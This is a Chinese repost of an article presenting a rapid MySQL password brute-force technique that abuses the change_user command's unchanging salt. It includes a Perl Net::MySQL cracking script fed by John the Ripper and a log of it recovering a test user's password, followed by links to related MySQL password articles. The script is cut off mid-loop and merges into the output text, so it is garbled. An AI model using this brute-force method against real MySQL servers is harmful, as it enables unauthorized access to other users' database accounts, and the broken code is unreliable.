快速的 MySQL 本地和远程密码破解_MySQL
快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。
我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。
方法如下:
攻击者使用一个无特权帐号登录到 MySQL 服务器,mysql 有一个名为 change_user 的命令,该命令可用于在 mysql 会话中修改用户时的名字建议。因为这个命令执行非常快,因此可以很快速的用来破解 mysql 密码,而不是每次都重新连接到 mysql 服务器。
是什么导致非常慢?
因为使用 change_user 命令不会更改 SALT(这是一个弱点),而常规破解密码的方法每次连接时服务器都发送不同的 SALT。
下面是一个 Perl 脚本使用了 John the Ripper 的方法来生成密码:
测试的用户是 crackme 密码为 pass,只需数秒就可破解。
(大约 20 秒钟可测试 10 万密码)
测试脚本如下:
01 use Net::MySQL; 02 03 $|=1; 04 05 my $mysql = Net::MySQL->new( 06 hostname => '192.168.2.3', 07 database => 'test', 08 user => "user", 09 password => "secret", 10 debug => 0, 11 ); 12 13 $crackuser = "crackme"; 14 15 while(下面是我这台机器上的执行结果:
C:/Users/kingcope/Desktop>C:/Users/kingcope/Desktop/john179/run/jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted
祝你好运:)
via grok
bitsCN.com推荐阅读
-
MySQL用户和权限及破解root口令的方法示例
-
mysql root用户的密码修改和消除
-
浅谈mysql密码遗忘和登陆报错的问题
-
浅谈mysql密码遗忘和登陆报错的问题
-
mysql 忘记密码的解决方法(linux和windows小结)
-
Windows 64 位 mysql 5.7以上版本包解压中没有data目录和my-default.ini及服务无法启动的快速解决办法(问题小结)
-
Ubuntu查看修改mysql的登录名和密码、安装phpmyadmin
-
mysql 5.1版本修改密码及远程登录mysql数据库的方法
-
MySQL5.7.20解压版安装和修改root密码的教程
-
远程连接mysql很慢,但是本地连接mysql却很快,ping和route网络通信都是正常的怎么办?